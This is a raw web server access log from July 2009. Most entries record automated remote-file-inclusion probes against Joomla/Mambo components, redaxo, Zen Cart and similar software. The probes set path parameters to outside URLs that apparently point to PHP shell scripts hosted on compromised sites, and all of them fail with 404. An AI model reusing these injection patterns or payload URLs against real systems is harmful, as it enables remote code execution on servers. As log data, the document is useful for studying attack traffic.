217.169.210.130 - - [10/Jul/2009:03:44:07 -0400] "GET /logs/access_log.Q109060100//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
65.254.32.2 - - [10/Jul/2009:03:44:29 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:44:29 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:44:29 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jul/2009:03:45:55 -0400] "GET //viewbody.html?code=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
209.172.33.230 - - [10/Jul/2009:03:45:55 -0400] "GET /logs//viewbody.html?code=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.812"
209.172.33.230 - - [10/Jul/2009:03:45:55 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
65.254.32.2 - - [10/Jul/2009:03:45:57 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jul/2009:03:46:06 -0400] "GET /logs/access_log.Q109061000//viewbody.html?code=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
65.23.158.226 - - [10/Jul/2009:03:46:09 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:03:46:09 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:03:46:09 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:03:46:10 -0400] "GET /logs/access_log.Q109061900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.254.32.2 - - [10/Jul/2009:03:46:14 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:46:24 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:03:46:26 -0400] "GET /logs//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:03:46:26 -0400] "GET //viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:03:46:31 -0400] "GET //viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:03:46:31 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:03:46:33 -0400] "GET /logs//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Jul/2009:03:46:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.86.17.106 - - [10/Jul/2009:03:47:07 -0400] "GET /logs/access_log.Q109061000//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:03:47:16 -0400] "GET /logs/access_log.Q109061000//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
66.178.116.28 - - [10/Jul/2009:03:48:48 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.178.116.28 - - [10/Jul/2009:03:48:48 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
66.178.116.28 - - [10/Jul/2009:03:48:48 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
115.76.0.105 - - [10/Jul/2009:03:48:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
115.76.0.105 - - [10/Jul/2009:03:48:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
115.76.0.105 - - [10/Jul/2009:03:48:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
66.178.116.28 - - [10/Jul/2009:03:49:09 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:49:52 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:49:56 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:49:56 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
79.148.238.69 - - [10/Jul/2009:03:49:57 -0400] "GET /logs/access_log.Q109060100//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
216.117.172.131 - - [10/Jul/2009:03:50:02 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:50:04 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:50:05 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:50:05 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:50:12 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:50:40 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:51:00 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:51:00 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:51:00 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jul/2009:03:51:33 -0400] "GET /logs/access_log.Q109052100%20//viewbody.html?code=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.812"
209.59.12.99 - - [10/Jul/2009:03:51:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.172.131 - - [10/Jul/2009:03:52:27 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:29 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:33 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:36 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:52:38 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:41 -0400] "GET //redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:43 -0400] "GET /logs/access_log.Q109052600//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:43 -0400] "GET /logs//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:52:47 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:48 -0400] "GET /logs/access_log.Q109053100//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:51 -0400] "GET //redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:51 -0400] "GET /logs/access_log.Q109052600//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:51 -0400] "GET /logs//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:52:58 -0400] "GET /logs/access_log.Q109053100//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:09 -0400] "GET /logs/errors.php?error=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:09 -0400] "GET /errors.php?error=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:10 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:17 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:29 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:29 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:29 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:53:30 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:53:30 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:53:30 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:53:37 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:53:42 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:54:23 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.celaf.edu.bo/biblioteca/pepek.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:54:23 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.celaf.edu.bo/biblioteca/pepek.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:54:23 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.celaf.edu.bo/biblioteca/pepek.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:54:26 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.celaf.edu.bo/biblioteca/pepek.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:03:54:39 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:03:54:39 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:03:54:39 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:03:54:39 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:54:52 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:54:52 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:54:57 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:03:55:00 -0400] "GET /logs/access_log.Q109062700//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:55:13 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:03:55:57 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:03:55:57 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:03:55:57 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:03:56:00 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:03:56:00 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:03:56:00 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:03:56:03 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
216.117.172.131 - - [10/Jul/2009:03:56:05 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:56:06 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:03:56:06 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
216.117.172.131 - - [10/Jul/2009:03:56:08 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:03:56:09 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.68.247 - - [10/Jul/2009:03:56:13 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L2012EF366E907300E520037+WSEQ(S0060):1+OUITEM(A0200):04948701 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.86.17.106 - - [10/Jul/2009:03:56:15 -0400] "GET /logs/access_log.Q109052100%20//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
91.121.89.135 - - [10/Jul/2009:03:56:15 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:56:15 -0400] "GET /logs/access_log.Q109051700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:56:15 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:56:33 -0400] "GET /logs//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:56:33 -0400] "GET //redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:56:33 -0400] "GET /logs/access_log.Q109053100//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:56:33 -0400] "GET /logs/access_log.Q109052600//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:03:56:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [10/Jul/2009:03:56:53 -0400] "GET /logs/access_log.Q109053000%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:57:07 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:57:09 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:57:15 -0400] "GET /logs/access_log.Q109052100%20//viewbody.html?code=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
91.121.89.135 - - [10/Jul/2009:03:57:31 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:03:57:31 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:58:05 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
